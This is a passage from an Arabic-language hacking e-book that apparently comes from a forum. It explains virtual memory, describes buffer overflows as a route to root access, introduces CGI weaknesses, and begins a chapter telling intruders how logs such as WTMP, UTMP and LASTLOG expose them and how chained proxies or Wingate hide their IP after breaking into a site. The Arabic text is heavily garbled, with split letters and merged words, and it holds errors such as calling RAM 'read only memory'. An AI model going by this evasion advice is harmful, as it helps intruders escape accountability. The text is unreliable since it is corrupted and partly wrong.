‫ﺘﺸﻐﯿ ﻞ‪-operating systems-‬ﺎﻟ ﺤﺪﯾﺜﺔ ذاﻛ ﺮةاﻓ‬
‫ﺗﺪﯾ ﺮأﻧﻈﻤﺔ ﺎﻟ‬

‫وﻫﺬهاﻟﺬاﻛ ﺮةﺗﻔﯿﺪ ﻋﻨﺪﻣﺎ ﯾﻜﻮنﻟﺪﯾﻨﺎ ﻋﺪدﻛﺒﯿ ﺮ ﻣﻦاﻟﻤﻬﺎم ﻣﻮﺟﻪاﻟﻰاﻟﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔاﻟ ﺮام ‪ ...‬وﻓﻲ ﻧﻔ ﺲ‬
‫ﻗ ﺖﻓﺎﻟﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔأ ﺻﻐ ﺮ ﻣﻦﻛﻤﯿﺔاﻟﻤﻬﺎماﻟﻤﻮﺟﻬﻪﻟﻠﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔ ‪...‬‬ ‫اﻟﻮ‬
‫ﺘ ﺮا ﺿﯿﺔ ﺣﯿﺚﺗﻘﻮمﺑﺨﺰناﻟﺒﯿﺎﻧﺎ تاواﻟﻤﻬﺎمﻓﻲ ﻣﻜﺎن ﻣﺎ ﻋﻠﻰاﻟﻬﺎردﯾﺴﻚﻓﻲ‬ ‫ﻫﻨﺎ ﯾﺄﺗﻲ دوراﻟﺬاﻛ ﺮةاﻻﻓ‬
‫ﺘﻢ‬
‫ﻣﻨﻄﻘﺔ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎا ل ‪ SWAP‬او ‪ Back store‬وﺗﻌﺎﻣ ﻞ ﻫﺬهاﻟﺒﯿﺎﻧﺎ ت وﻛﺄﻧﻬﺎﻓﻲاﻟﺬاﻛ ﺮةﺗﻤﺎﻣﺎ وﯾ‬
‫ﺘ ﺮا ﺿﯿﺔ ﻣﻦ ﺧﻼ ل ﻋﻤﻠﯿﺔ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ ‪swapping‬‬ ‫ﻋﻤﻠﯿﺔ ﻧﻘﻠﻬﺎ ﻣﻦ واﻟﻰاﻟﺬاﻛ ﺮةﺑﺎدارة ﻫﺬهاﻟﺬاﻛ ﺮةاﻻﻓ‬
‫ﺘﻲ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ )‬‫ﺘ ﺮا ﺿﯿﺔاﻣﺎاﻟﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔﻓﻬﻲ ﻣﻌ ﺮوﻓﺔﻟﺪىاﻟﺠﻤﯿﻊ واﻟ‬ ‫وﻫﺬا ﻣﻠﺨ ﺺ ﻋﻦاﻟﺬاﻛ ﺮةاﻻﻓ‬
‫‪ READ ONLY MEMORY (RAM‬اواﻟﺬاﻛ ﺮةاﻟﻔﯿﺰﯾﺎﺋﯿﺔ ‪...‬‬
‫‪------‬‬

‫ـ‪Buffer Overflow‬‬ ‫ﺘﻐﻼ ل ﻣﺎذﻛ ﺮﻓﻲاﻟ‬ ‫‪-٤‬اﺳ‬


‫‪---------------------------------------------‬‬
‫ﺘﻔﯿﺪ ﻣﻦاﻟﺬيﻗﻠﻨﺎ ﻋﻦاﻟﻤﻌﺎﻟﺠﺔ وإدارةاﻟﺬاﻛ ﺮةﻟﻠﻮ ﺻﻮ ل‬ ‫ﺎﻵن ﻧﺼ ﻞإﻟﻰاﻟﺠﺰ ء ﺎﻷﻫﻢ واﻟﻤ ﺮ ح ‪....‬ﻛﯿ ﻒ ﻧﺴ‬
‫ّﻪ ﻋﻨﺪﻣﺎ ﯾﻜﻮن‬ ‫ﻗ ﺖ ﺳﺎﺑ ﻖﺑﺄﻧ‬ ‫ّ ﺮ ﻧ ﺤﻦﻗﻠﻨﺎﻓﻲ و‬‫ﺘ ﺮا قاﻟﻨﻈﺎم؟ﺗﺬﻛ‬ ‫ﻮاﻟﺪ ﺧﻮ لاﻟﻰاﻟﺠﺬر )‪ (Root‬ﻮأ ﺧ‬
‫ﺘﻔﯿ ﺾ‬ ‫ّﺼ ﺖﻟﻬﺬه ﺎﻟﺒﯿﺎﻧﺎ ت‪،‬اﻟﺒﯿﺎﻧﺎ تاﻟﺰاﺋﺪة ﺳ‬‫ﺘﻲ ﺧﺼ‬ ‫ﺘﺨﺪمأﻛﺒ ﺮ ﺣﺠﻤﺎ ﻣﻦاﻟﺬاﻛ ﺮةاﻟ‬ ‫اﻹد ﺧﺎ ل)اﻟﺒﯿﺎﻧﺎ ت( ﻣﻦاﻟﻤﺴ‬
‫ﺘﻔﯿﺪ ﻣﻨﻪﻓﻲ‬ ‫ّ ﺮ؟ﻫﺬااﻟﻤﻜﺎن ﻣﻦاﻟﺬاﻛ ﺮة ﻫﻮاﻟﻤﻜﺎناﻟﺬي ﻧﺴ‬ ‫ﺘﻐﯿ‬‫ﺘﻲﺑﻌﺪاﻻﺳﻢاﻟﻤ‬ ‫)‪(overflow‬ﻓﻲاﻟﺬاﻛ ﺮةاﻟ‬
‫ﺘ ﺮا ق‪.‬‬
‫اﻷ ﺧ‬
‫ﺘﺨﺪم )ﻓﻲاﻟﻤﺜﺎ لاﻟﺴﺎﺑ ﻖ وﻫﻮاﻻﺳﻢ‬ ‫ﺘﻲ ﯾﺪ ﺧﻠﻬﺎاﻟﻤﺴ‬‫ﻣﺎذا ﻧﻌﻤ ﻞﻓﻲ ذﻟﻚ ﺎﻟﻤﻜﺎن‪ :‬دا ﺧ ﻞ ﺧﻂ )ﻣﻜﺎن(اﻟﺒﯿﺎﻧﺎ تاﻟ‬
‫ﺎﻷو لاﻟﺬي ﯾﻄﻠﺐ ﻣﻦﻗﺒ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞﺛﻢأد ﺧﻠﻨﺎه ( ﻧ ﻀﻊاﻷواﻣ ﺮاﻷﻛﺜ ﺮ ﺷﻌﺒﯿﺔﻟﻠ ﺤﺎﺳﻮب‪ ،‬ﺣﯿﺚ ﻫﺬهاﻷواﻣ ﺮ‬
‫ّ‪.‬‬
‫ﺘﻐ ﻞ‬
‫ﺘﺨﺪاﻣﻪﻓﯿﻤﺎﺑﻌﺪﻟﻠﻘﯿﺎمﺑﺎﻟﺴﯿﻄ ﺮةاﻟﻜﺎﻣﻠﺔﻟﻠﻨﻈﺎماﻟﻤﺴ‬ ‫ﺘﻄﯿﻊاﺳ‬ ‫ﺘ ﺞ(ﻫﯿﻜ ﻞ ﻧﺴ‬ ‫ﺗﺠﻌ ﻞاﻟ ﺤﺎﺳﻮب ﯾ ﺤﺪ ث)ﯾﻨ‬
‫اﻟﻘﯿﺎمﺑﻬﺬااﻟﻌﻤ ﻞﻟﯿ ﺲﺑﯿﺴﻄﺎﻛﻤﺎ ﯾﺒﺪوﻟﻚ‪،‬إذنﻟﻮأرد ت ﻣﻌ ﺮﻓﺔﻛﯿ ﻒ ﯾﻌﻤ ﻞ ‪،‬أﻧ ﺖ ﯾﺠﺐأنﺗﻘ ﺮأاﻟﻤﻘﺎﻟﺔ‬
‫ـ ‪Buffer‬‬ ‫ﺘﻐﻼ ل وا ﺣﺪه ﻣﻦاﻟ‬ ‫اﻟﻘﺎدﻣﺔ ﺣﻮ ل ‪ Buffer Overflows،‬ﺎﻟﺬي ﺳﯿﺼ ﻒﺑﺎﻟ ﻀﺒﻂﻛﯿ ﻒ ﻹﺳ‬
‫ﺘ ﺮا ق‪.‬‬‫‪Overflows‬ﻓﻲ ﺎﻹ ﺧ‬

‫‪٣٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊاﻟﺴﯿﻜﯿﻮرﺗﻲ ﺣﯿﺚ ﯾﻮﺟﺪ‬ ‫ﺘ ﺮدد ﻋﻠﯿﻬﻢﻛﺜﯿ ﺮاﻓﻲ ﻣﻮا‬


‫ﺘ‬‫ﻗﯿﻦﻷﻧﻬﺎ ﺳ‬‫ﺘﺮ‬‫ﻛﺎﻧ ﺖﻫﺬهةﻣﻘﺪﻣﺔﺑﺴﯿﻄﺔ وﻣﻬﻤﺔﻟﻠﻤﺨ‬
‫ﺘﯿﺠﺔﻟﻤﺎ‬‫ﻗ ﺖاﻟﻤﻌﺎﻟﺠﺔاوﻓﻲاﻟﻄﻔ ﺤﺎناﻟ ﺤﺎد ثﻓﻲاﻟﺬاﻛ ﺮة ﻧ‬ ‫اﻟﻌﺪﯾﺪ ﻣﻦاﻟﺜﻐ ﺮا ت ﺣﻮ ل ﻫﺬهاﻟﻤﺸﺎﻛ ﻞاﻣﺎﻓﻲ و‬
‫ﺳﺒ ﻖ ذﻛ ﺮه ‪....‬‬

‫‪٣٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻟـ ‪ CGI‬وﻋﻼﻗﺘﻬﺎ ﺑﺎﻹﻧﱰﻧﺖ "‬

‫‪$$$$$$$$$$$‬‬
‫ـﻮ ل‬
‫ـ‬
‫ـ‬‫ـ‬
‫ـ‬‫ـ‬
‫ـ‬
‫ـ‬‫ـﻘ‬
‫ـ‬
‫ـ‬‫ـ‬
‫ـ‬‫ـﻨ‬
‫ـ‬
‫ـ‬‫ـ‬
‫ﻣ‬
‫‪$$$$$$$$$$$‬‬

‫ﺘ ﺮﻧ ﺖ ‪:‬‬
‫ﺘﻬﺎﺑﺎﻻﻧ‬
‫ﻗ‬‫ـ ‪ CGI‬و ﻋﻼ‬
‫ﻓﻲ ﻫﺬااﻟﻤﻠ ﻒ ﺳﻮ ف ﻧﻘﻮمﺑﻌ ﺮ ض ﻣﻘﺪﻣﺔاﻟ‬
‫ـ ‪CGI‬‬‫)‪ (١‬ﻣﻘﺪﻣﺔﻟﻠ‬

‫ﺘﻲﺗﺴﻤﺢﺑﺎﻻﺗﺼﺎ لﺑﯿﻦ ﺟﺎﻧﺐ‬ ‫‪ CGI=COMMON GATEWAY INTERFACE‬ﻫﻲاﻟﻮاﺟﻬﺔاﻟ‬


‫ﺘﺼﻔﺢأواﻟﺒ ﺮاﻣ ﺞ و ﺧﻼﻓﻪ و ﺟﺎﻧﺐاﻟﻮﯾﺐ ﺳﯿ ﺮﻓ ﺮاﻟﺬي ﯾﻔﻬﻢﺑ ﺮوﺗﻮﻛﻮ ل )‪(HTTP‬‬ ‫ﺘﺨﺪم ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻤ‬ ‫اﻟﻤﺴ‬
‫‪.‬‬
‫ﺛﻨﺎ ءاﻻﺗﺼﺎ ل ‪.‬اﻟﺒﻮر ت‬ ‫ﺘﺨﺪﻣﻪ ﺳﻜ ﺮﯾﺒ ﺖاﻟﺴﻲ ﺟﻲأي واﻟﺴﯿ ﺮﻓ ﺮأ‬ ‫ـ ‪ TCP/IP‬ﻫﻮاﻟﺒ ﺮوﺗﻮﻛﻮ لاﻟﺬي ﯾ ﺴ‬ ‫اﻟ‬
‫ﺘﻐﯿ ﺮ ﻫﺬهاﻟﺒﻮر ت( ‪.‬‬ ‫اﻟﻤ ﺤﺪدةﻟﻬﺬاﻟﺒ ﺮوﺗﻮﻛﻮ لﻫﻲ ‪ ) ٨٠‬ﻣﻦاﻟﻤﻤﻜﻦأنﺗ‬
‫ﺘﺎﺋ ﺞ ﻣ ﺤﺪدة ﻃﺒﻘﺎ‬‫ﺘﻮﻟﯿﺪ ﺻﻔ ﺤﺎ تاﻟﻮﯾﺐ واﻟﺼﻮر وأﯾ ﻀﺎ ﻧ‬ ‫ﺘﺎ تاﻟﺴﻲ ﺟﻲأيأنﺗﻘﻮمﺑ‬ ‫ﺘﻄﯿﻊ ﺳﻜ ﺮﯾﺒ‬ ‫ﺗﺴ‬
‫ﻟﻤﺪ ﺧﻼ ت ﻣﻌﯿﻨﻪ ﯾﻘﻮم‬
‫ﺘ ﺤﺪﯾﺪﻫﺎ‬‫ﻣﺒ ﺮﻣ ﺞاﻟﺴﻲ ﺟﻲأيﺑ‬
‫ﺘﯿﻦ ‪:‬‬ ‫ﺘﺎ تاﻟﺴﻲ ﺟﻲأي ﻋﻠﻲ ﺧﻄﻮﺗﯿﻦأﺳﺎﺳﯿ‬ ‫ﯾﻘﻮم ﻋﻤ ﻞ ﺳﻜ ﺮﯾﺒ‬
‫ﺘﻲأد ﺧﻠ ﺖﻟﻪ ‪.‬‬ ‫‪-١‬ﻓﻲاﻟﺨﻄﻮةاﻷوﻟﻰ ﯾﻘﻮماﻟﺴﻜ ﺮﯾﺒ ﺖﺑﻌﻤ ﻞ ﻣﻌﺎﻟﺠﺔأوﻟﯿﻪﻟﻠﺒﯿﺎﻧﺎ تاﻟ‬
‫ﺘﺼﻔﺢﺑﺎرﺳﺎﻟﻬﺎاﻟﻲاﻟﺴﯿ ﺮﻓ ﺮأواﻟﻌﻜ ﺲ ‪.‬‬ ‫ﺘﻲ ﯾﻘﻮماﻟﻤ‬ ‫‪-٢‬ﻓﻲاﻟﺨﻄﻮةاﻟﺜﺎﻧﯿﺔ ﯾﻌﻤ ﻞاﻟﺴﻜ ﺮﯾﺒ ﺖﻛﻘﻨﺎهﻟﻠﺒﯿﺎﻧﺎ تاﻟ‬
‫ﺘﻤﻜﻦ ﻣﻦاﻟﻌﻤ ﻞﻓﻲأي ﻣﻨﺎ خﻟﻠﻌﻤ ﻞ‪.‬‬ ‫ﺘﻲﺗ‬ ‫ﺘﺸﻔﯿ ﺮاﻟﺒﯿﺎﻧﺎ ت ﺣ‬‫ﯾﻘﻮم ﺳﻜ ﺮﯾﺒ ﺖاﻟﺴﻲ ﺟﻲأيﺑ‬
‫ﺘﺎﺑﺔ ﺳﻜ ﺮﯾﺒ ﺖاﻟﺴﻲ ﺟﻲأيﺑﺄيﻟﻐﺔﺑ ﺮﻣﺠﺔ ﺳﻮا ءﻛﺎﻧ ﺖﻟﻐﺔ ﻣﺠﻤﻌﺔ ﻣﺜ ﻞاﻟﻔﯿﺠﻮا لﺑﯿﺴﻚأوﻟﻐﺔ‬ ‫ﯾﻤﻜﻦﻛ‬
‫ﺘ ﺮﺟﻤﺔ ﻣﺜ ﻞاﻟﺒﯿ ﺮ ل واﻟﻔ ﺮ قاﻟﻮ ﺣﯿﺪﺑﯿﻦ ﻧﻮﻋﯿﻦاﻟﻠﻐﺎ ت أناﻟﺒ ﺮﻧﺎﻣ ﺞ اﻟﻤﺒ ﺮﻣ ﺞﺑﺎﻟﻠﻐﺔاﻟﻤﺠﻤﻌﺔ ﺳﻮ ف ﯾﻜﻮن‬ ‫ﻣ‬
‫ﺘﻄﻮﯾ ﺮ ‪.‬‬ ‫ﺘ ﺮﺟﻤﺔأﺳ ﺮ عﻓﻲ ﻋﻤﻠﯿﺔاﻟ‬ ‫ﺘﻨﻔﯿﺬ وﻟﻜﻦاﻟﻠﻐﺎ تاﻟﻤ‬ ‫أﺳ ﺮ عﻓﻲاﻟ‬
‫ﻟﻠﺴﻜ ﺮﯾﺒ ﺖاذاأرد تأنﺗﻌﻤ ﻞ ﻋﻠﻲﺗﻌﺪﯾ ﻞاﻟﺴﻜ ﺮﯾﺒ ﺖأوﺗﻄﻮﯾ ﺮه‬
‫ﺘﺎﻟﻲ ‪:‬‬‫ﺛﯿﻘﺔاﻟﺼﻠﻪﻟﻤﻮ ﺿﻮﻋﻨﺎﻫﻲﻛﺎﻟ‬ ‫ﺘﺒ ﺮ و‬‫ﺘﻲﺗﻌ‬ ‫أﻫﻢاﻷواﻣ ﺮاﻟ‬
‫ﺘﺼﻔﺢ ‪.‬‬ ‫‪ GET -١‬ﻫﺬااﻷﻣ ﺮ ﯾﻘﻮمﺑﻄﻠﺐﺑﯿﺎﻧﺎ ت ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮﻟﻠﻤ‬
‫ﺘﺼﻔﺢ ‪.‬‬ ‫‪ POST -٢‬ﻫﺬااﻷﻣ ﺮ ﯾﻄﻠﺐ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮﻗﺒﻮ لاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﺪ ﺧﻠﺔاﻟﯿﻪ ﻣﻦاﻟﻤ‬
‫‪ PUT -٣‬ﻫﺬااﻷﻣ ﺮ ﯾﻄﻠﺐ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮﻗﺒﻮ لاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤ ﺮﺳﻠﻪاﻟﯿﻪﻛﺒﺪﯾ ﻞ ﻋﻦاﻟﻤﺪ ﺧﻼ تاﻟﻤﻮﺟﻮدة ﺣﺎﻟﯿﺎ‬
‫‪.‬‬
‫)‪ (٢‬ﻧﻘﺎطاﻟ ﻀﻌ ﻒ ‪:‬‬
‫ﺘﻲ ﯾﺴﺒﺒﻬﺎ ﺳﻜ ﺮﯾﺒ ﺖاﻟﺴﻲ ﺟﻲأيﻟﯿ ﺲ ﺿﻌﻔﺎﻓﻲاﻟﺴﻲ ﺟﻲأي ﻧﻔﺴﻪ وﻟﻜﻨﻪ ﺿﻌ ﻒﻓﻲ‬ ‫ﻧﻘﺎطاﻟ ﻀﻌ ﻒاﻟ‬
‫ﺘﻠﻔﺔ ‪.‬‬
‫ﺘﺸﻐﯿ ﻞاﻟﻤﺨ‬ ‫ـ‪HTTP‬أوﻓﻲأﻧﻈﻤﺔاﻟ‬ ‫ﺑ ﺮوﺗﻮﻛﻮ لاﻟ‬
‫ﺘﻐﻼ ل ﻧﻘﺎطاﻟ ﻀﻌ ﻒاﻟﻤﻮﺟﻮدة وﻟﻜﻦ ﻫﻨﺎك ﻃ ﺮ قأ ﺧ ﺮيﻟﻠﻮ ﺻﻮ لاﻟﻲﺗ ﺤﻄﯿﻢاﻟﻨﻈﺎم‬ ‫اﻟﺴﻲ ﺟﻲأي ﯾﺴﻤﺢﺑﺎﺳ‬
‫ـ ‪FTP‬أو ‪....TELNET‬‬ ‫ﺘﺨﺪاماﻟ‬ ‫اﻷﻣﻨﻲ ‪.‬ﻛﻤﺜﺎ ل ﯾﻤﻜﻦاﻟﻮﺻﻮ لاﻟﻲاﻟﻤﻠﻔﺎ تاﻟﻐﯿ ﺮ ﻣ ﺤﻤﯿﺔﺑﺎﺳ‬

‫‪٣٨‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

‫اﻟﻔ ﺼ ﻞ اﻟﺜﺎﻧﻲ‬
<><><><><><><><><><><><><><><><><><><><><><><><><><><><>

((‫))اﻟﺤﻤﺎﯾﺔواﻟﺘﺨﻔﻲ‬

٣٩
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"اﻷﻣﻦ و)))اﻟﺘﺨﻔﻲ((( ﰲ اﻹﻧﱰﻧﺖ"‬

‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬
‫ـ ﺮ & ‪hi_haCker‬‬
‫ـ‬
‫ـﺪ><‬
‫ـ‬
‫ـ><‬
‫ـ‬
‫ﺎﻟﻜﺎﺗﺐ‪ & JawaDal :‬ﺎﻟ‬
‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬

‫ﺛﺎرهﻓﻤﺎﻫﻲاﻟﻔﺎﺋﺪة‬ ‫ﺘﻌ ﺮ ف ﻋﻠﻰﻛﯿﻔﺒﺔ ﺣﻤﺎﯾﺔ وﺗﻐﻄﯿﺔا‬


‫ﻗﻊان ﯾ‬ ‫ﺘ ﺮ قأي ﻣﻮ‬‫ﺘ ﺮ قﻗﺒ ﻞأن ﯾﻔﻜ ﺮﻓﻲا ﺧ‬
‫ﻋﻠﻰﻛ ﻞ ﻣﺨ‬
‫ﺘ ﺮا ق ﻻﻧﻚ‬
‫ﺘﻌﻠ ﻖﺑﺎﻻ ﺧ‬‫ﻗﻊﺛﻢ ﯾ ﺤﻜﻢ ﻋﻠﯿﻚﻛﻤﺠ ﺮمﺑﺎﻟﺴﺠﻦ ل ‪ .......‬وﺳﻮ فﺗﻨﺴﻰﺑﻌﺪﻫﺎﻛ ﻞ ﻣﺎ ﯾ‬ ‫ﺘ ﺮ ق ﻣﻮ‬‫انﺗﺨ‬
‫ﻗﺒﺔ ﺷﺪﯾﺪة ‪......‬اﻟ ﺦ‬
‫ﻗﺐ ﻣ ﺮا‬‫ﺘﻜﻮن ﻣ ﺮا‬‫ﺳ‬
‫ﻗﯿﻦ ﻫﻲ ﻣﻠﻔﺎ تاﻟﻮﺟ ﺲ ‪LOGs‬ﻓﻤﺜﻼ ﻋﻨﺪ د ﺧﻮﻟﻚ ﻻ فﺗﻲﺑﻲ‬ ‫ﺘﺮ‬‫وأﻛﺜ ﺮ ﻧﻘﻄﺔﺗﻜﻮن ﻣﺼﯿﺪةﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻤﺨ‬
‫ﺘﻚﻟﺬﻟﻚ و ﺣﺎوﻟ ﺖ‬ ‫ﺘﯿﺎ ﻃ‬
‫ﻗﻚﺑﺎﻟﻔﻌ ﻞاذاﻟﻢﺗﻜﻦﻗﺪ و ﺿﻊا ﺣ‬ ‫ﺘ ﺮا‬
‫ﻗﻊ ﻣﻦ ﺧﻼ لأيﺛﻐ ﺮةﻛﺎﻧ ﺖﻓﻬﺬا ﯾﻌﻨﻲاﻧﻪﺗﻢا ﺧ‬ ‫ﻣﻮ‬
‫انﺗﻜﻮن ‪!! anonymous‬‬
‫ﻻﻧﻚﺑﻤﺠ ﺮداﻟﺪ ﺧﻮ لﻟﻼ فﺗﻲﺑﻲ ﻓﻲ ﺣﺎﺟﻪاﺳﻤﻬﺎ‪ LOGS...(LOG.FILES) 1‬وﻫﻨﺎ ﻣ ﺮﺑﻂاﻟﻔ ﺮس ‪....‬‬
‫اﻟﻜ ﻞ ﺳﯿﺴﺎ لاﻻن ﻋﻦ و ﺿﯿﻔﺔ ﻫﺬه ? ‪Logs‬‬

‫ﺘﺴﺠﯿ ﻞ ﻛ ﻞ ﺷﺨ ﺺاﺗﺼ ﻞﺑﺎﻟﺠﻬﺎز)‪ (loged in‬و ﯾ ﺤﺼﻠﻮا ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ ت‬


‫ﺘﻲﺗﻘﻮمﺑ‬
‫ا ل‪ log files‬ﻫﻲاﻟ‬
‫ﻣﺜ ﻞ‪:‬‬

‫ﻗﻊاﺗﯿ ﺖ ‪....‬ﻓﺼﻠ ﺖأو ‪.. online‬ا ل ‪IP‬‬


‫ﺘ ﺮا ق((ﺑﺎﻟ ﻀﺒﻂ ‪ ...‬و ﻣﻦاي ﻣﻮ‬ ‫ﻗ ﺖ ﻋﻤﻠﯿﺔاﻻ ﺧ‬ ‫ﻗ ﺖاﻟﺪ ﺧﻮ ل ))و‬ ‫و‬
‫‪Address‬ﻟﻚ ‪ ...‬ا ل‪) host name‬اﺳﻢاﻟﺠﻬﺎز( ‪....‬‬
‫اﻟﺪوﻟﻪ‬
‫اﻟﻤﺪﯾﻨﻪ‬
‫ﺘﺸﻐﯿ ﻞ‬‫ﻧﻈﺎماﻟ‬
‫ﺘﺼﻔﺢ ‪ ...‬وﻣﺰوداﻟﺨﺪﻣﻪاﻟﺨﺎ صﺑﻚ)‪Internet server provide(ISP‬‬ ‫اﻟﻤ‬
‫ﻗﻊ‬‫!!!!ﻫ ﻞ رأﯾ ﺖ ﻣﺪى ﺧﻄﻮرة ﻫﺬااﻻﻣ ﺮ وﻛﯿﻔﯿﺔ ﺳﻬﻮﻟﺔا ﺻﻄﯿﺎدك ﻣﻦﻗﺒ ﻞاﻟﺠﻬﺎ تاﻟﻤﺴﺆوﻟﺔ ﻋﻦ ﻫﺬااﻟﻤﻮ‬
‫أو ﻏﯿ ﺮه ‪!!!...‬‬
‫وﻫﻨﺎﻟﻚ ‪٣‬اﻧﻮا ع ‪ log files‬ﻣﻬﻤﻪ‪:‬‬
‫‪ - WTMP‬ﯾﺴﺠ ﻞﻛ ﻞ د ﺧﻮ ل\ ﺧ ﺮوج‪ ،‬ﻣﻊ ﻣﯿﻌﺎداﻟﺪ ﺧﻮ ل\اﻟﺨ ﺮوجﺑﺎﻻ ﺿﺎﻓﻪاﻟﻰا ل‪host‬‬
‫‪- UTMP‬ﻣﻦ ‪Onlne‬ﻓﻲﻫﺬهاﻟﻠ ﺤﻈﻪ‬
‫‪– LASLOG‬ا ﺧ ﺮ د ﺧﻮ ل‬

‫ﻗﻊﺑﻚ) ‪track you‬‬ ‫واﻟﻜﺜﯿ ﺮاﻟﻜﺜﯿ ﺮ!!ﻟﺬاﻟﻮأراداﻻدﻣﻦان ﯾﻠﻘﻲ ﻧﻈ ﺮه ﻋﻠﯿﻬﻢ )‪ (log.files‬ﺳﻮ ف ﯾﻮ‬
‫‪(down‬‬
‫ﺘﺨﺪمﺑ ﺮوﻛﺴﯿﯿﻦ ﻫﻨﺎﻟﻚاﻣ ﺮ ﯾﺠﺐانﺗﻌ ﺮﻓﻪ‬ ‫ﺘﺒﺎدراﻟﻰ ذﻫﻨﻚ وﺗﻘﻮ ل ‪:‬ﻟﯿﺴ ﺖ ﻫﻨﺎﻟﻚأي ﻣﺸﺎﻛ ﻞاﻧﺎ ﺳﺎﺳ‬ ‫رﺑﻤﺎ ﯾ‬
‫ﻋﻦاﻟﺒ ﺮوﻛﺴﯿﺎ ت‬
‫ﻗﻊ‪--FTP--‬ﺗﻠﻨ ﺖاواي ﺷﺊا ﺧ ﺮ!‬ ‫ﺟﻬﺎزك‪ <--‬ﺧﺎد ماﻟﺒ ﺮوﻛﺴﻲ‪<--‬اﻟﻤﻮ‬
‫ﺘﻲ‬‫ﺘﻄﯿﻊاﻻﯾﻘﺎ عﺑﻚ او ﺣ‬ ‫ﻗﻊ واﻻدﻣﻦارادان ﯾﻌ ﺮ ف ﻣﺼﺪرك وﻣﻦاﻧ ﺖ ‪.‬ﻓﺒﻘﻠﯿ ﻞ ﻣﻦاﻟﻤﺎ ل ﯾﺴ‬ ‫ﻗ ﺖ ﻣﻮ‬‫ﺘﺮ‬‫ﻟﻮا ﺧ‬
‫ﺘﺨﺪماﻛﺜ ﺮ ﻣﻦﺑ ﺮوﻛﺴﻲ‬ ‫ﺘ ﺮ قاﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ و ﺳﯿﻌ ﺮ ف ﻋﻨﻚﻛ ﻞ ﺷﺊ ‪ ..‬ﻧﻔ ﺲاﻟﻜﻼمﻟﻮﻛﻨ ﺖﺗﺴ‬ ‫ﯾﺨ‬
‫ﺟﻬﺎزك‪ <--‬ﺧﺎدماﻟﺒ ﺮوﻛﺴﻲاﻻو ل‪ <--‬ﺧﺎدماﻟﺒ ﺮوﻛﺴﻲاﻟﺜﺎﻧﻲ‪<--‬اﻟﺜﺎﻟﺚ‪...--so on--‬‬
‫ﺘﻪاﻟﻮﺻﻮ لاﻟﯿﻚ ‪.‬‬ ‫ﺘﻄﺎﻋ‬‫ﺘﻄﻠﺐ ﻣﻨﻪ ﺟﻬﺪا وﻣﺎﻻ ‪...‬ﻟﻜﻦﻓﻲاﻻ ﺧﯿ ﺮﺑﺎﺳ‬ ‫ﺘﻪان ﯾﺼ ﻞاﻟﯿﻚﻟﻜﻦ ذﻟﻚ ﯾ‬ ‫ﺘﻄﺎﻋ‬‫ﻓﺎنﺑﺎﺳ‬

‫‪٤٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺨﺪم ﺷﯿﺊاﺳﻤﻪ‪Wingate :- ..‬‬ ‫ﻟﻜﻦﺗﻘﺪراﯾ ﻀﺎﺗﺴ‬


‫ﺘﻔﺼﯿ ﻞ ﻻ ﺣﻘﺎ وﻫﻮ ﯾﺴ ﻤﺢ‬
‫‪ Wingate‬ﻫﻮﺑ ﺮوﻛﺴﻲ وﻟﻜﻦ ﻣﻊ ﺟﺪران ﺣﻤﺎﯾﺔ وﺳﺄﺗﻜﻠﻢ ﻋﻨﻪﺑﺸﺊ ﻣﻦاﻟ‬
‫ﺘﺼ ﻞ‬ ‫ﺘ‬‫ﺘ ﺮﻧ ﺖ وا ﺣﺪاواﻛﺜ ﺮ‪..‬ﻓﺎﺋﺪها ل‪Wingate‬اﻧﻪ ﺳﯿﺨﻔﻲا ل‪ IP‬ﻋﻦاﻟﻜﻤﺒﯿﻮﺗ ﺮاﻟﺬي ﺳ‬ ‫ﺑﻤﺸﺎرﻛﻪﻛﻮﻧﻜﺸﻦاﻧ‬
‫ﺑﻪ!!‬
‫وﻫﺬهﺑﻌ ﺾاﻟﻤﻼ ﺣﻈﺎ ت ﯾﺠﺐانﺗ ﻀﻌﻬﺎﻓﻲ ﺣﺴﺒﺎﻧﻚﻓﯿﺠﺐانﺗﻌ ﺮ فﻛﯿ ﻒﺗﺒﻘﻰ ‪ anonymous‬ﻋﻠﻰا ل‬
‫ﺘﺨﺪم ‪ firewall‬ﻣﺜ ﻞا ل ‪zone alarm .‬ﺎﻣﺴﺢ ﻣﻠﻔﺎ ت‬ ‫‪ ..web‬وﻛﯿ ﻒﺗﺆﻣﻦ ﺟﻬﺎزك؟!!‪......‬اﺳ‬
‫ﺘﻪ‪..‬واﻟﻤﻠﻔﺎ تاﻟﺸﺨﺼﯿﻪ و‬ ‫ﻗ‬‫ﺘ ﺮﻧ ﺖاﻟﻤﺆ‬
‫ﺘﻮري و ﻣﻠﻔﺎ تاﻻﻧ‬
